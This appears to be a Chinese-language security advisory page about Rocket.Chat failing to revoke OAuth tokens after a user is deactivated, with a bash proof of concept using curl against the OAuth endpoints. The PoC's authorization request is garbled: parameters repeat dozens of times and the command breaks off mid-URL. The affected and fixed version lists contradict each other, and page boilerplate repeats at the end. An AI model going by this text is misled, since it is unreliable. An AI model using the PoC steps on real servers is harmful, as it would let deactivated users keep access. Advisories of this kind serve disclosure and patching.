Rocket.Chat OAuth令牌撤销缺陷漏洞

漏洞概述 Rocket.Chat 8.2.0 在用户被停用后，不会撤销 OAuth 访问令牌和刷新令牌。这意味着被停用的用户仍然可以使用现有的 OAuth 访问令牌，并且可以从现有的刷新令牌中生成新的访问令牌。 影响范围 受影响版本：8.4.2, 8.4.4, 8.4.7, 8.5.0, 8.4.2, 8.3.4, 8.2.4, 8.1.5, 8.0.6, <7.13.8, <7.10.12 修复版本：8.0.6, 7.13.8, 7.10.12 修复方案 升级到修复版本：8.0.6, 7.13.8, 7.10.12 POC 代码 ```bash 1. Create an OAuth application as an admin: APP=$(curl -s -X POST http://localhost:3000/api/v1/oauth-apps.create \ -H 'X-Auth-Token: $ADMIN_TOKEN' \ -H 'X-User-Id: $ADMIN_ID' \ -H 'Content-Type: application/json' \ -d '{"name":"poc-app","redirectUri":"http://test.com,http://asd.com","active":true}' \ CLIENT_ID=$(jq -r '.application.clientId' <<< "$APP") CLIENT_SECRET=$(jq -r '.application.clientSecret' <<< "$APP") 2. Authorize the app using the victim's existing Rocket.Chat login token and exchange the code for tokens: AUTH=$(curl -sk -X POST \ "http://localhost:3000/oauth/authorize?scope=user&response_type=code&response_mode=post_form&state=&client_id=$CLIENT_ID&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http://asd.com&login_hint=$VICTIM_LOGIN_TOKEN&client_id=$CLIENT_ID&client_secret=$CLIENT_SECRET&redirect_uri=http:

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

Rocket.Chat OAuth令牌撤销缺陷漏洞

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Rocket.Chat OAuth令牌撤销缺陷漏洞

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！